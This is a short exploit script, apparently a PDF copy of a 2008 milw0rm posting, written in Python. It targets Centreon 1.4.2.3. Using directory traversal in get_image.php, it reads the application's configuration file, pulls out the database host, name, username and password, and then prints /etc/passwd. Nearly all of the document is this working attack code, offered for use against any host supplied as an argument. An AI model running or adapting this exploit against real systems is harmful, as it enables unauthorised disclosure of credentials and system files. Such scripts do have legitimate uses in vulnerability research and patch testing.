Centreon 1.4.2.3 get_image.php Remote File Disclosure Exploit.pdf

1 #!/usr/bin/python 2 3 # Date : 20/01/2008 4 # Author : Julien CAYSSOL <julien@aqwz.com> 5 6 import sys, urllib2,re 7 8 9 user_agent = ’Mozilla/6.0 (compatible; MSIE 6.0; Windows NT)’ 10 headers = { ’User−Agent’ : user_agent , 11 ’Accept−Charset’ : ’ISO−8859−15’ } 12 13 14 if __name__ == "__main__": 15 16 if len(sys.argv)==2: 17 host = sys.argv[1] 18 print " [+] Host : " + host 19 20 url = "http://"+sys.argv[1]+"/include/doc/get_image.php?lang=&img=../../www/oreon.conf.php" 21 req = urllib2.Request(url, None, headers) 22 html = urllib2.urlopen(req).read() 23 html = re.sub(’\n’,’’,html) 24 ident =re.findall(’\$conf_oreon\[\’host\’\] = "(.*?)";\$conf_oreon\[\’user\’\] = "(.*?)";\$conf_oreon\[\’password\’\] = "(.*?)";\$conf_oreon\[\’db\’\] = "(.* ?)";’,html) 25 print " [*] Result : " 26 print " + DB Host : "+ident[0][0] 27 print " + DB Name : "+ident[0][3] 28 print " + DB user : "+ident[0][1] 29 print " + DB pass : "+ident[0][2] 30 31 print " [*] /etc/passwd for Fun" 32 url = "http://"+sys.argv[1]+"/include/doc/get_image.php?lang=&img=../../../../../etc/passwd" 33 req = urllib2.Request(url, None, headers) 34 html = urllib2.urlopen(req).read() 35 print html 36 37 else: 38 print "./Poc.py HOST" 39 40 # milw0rm.com [2008−02−28] Page 1/1 Centreon 1.4.2.3 get_image.php Remote File Disclosure Exploit Julien CAYSSOL 02/28/2008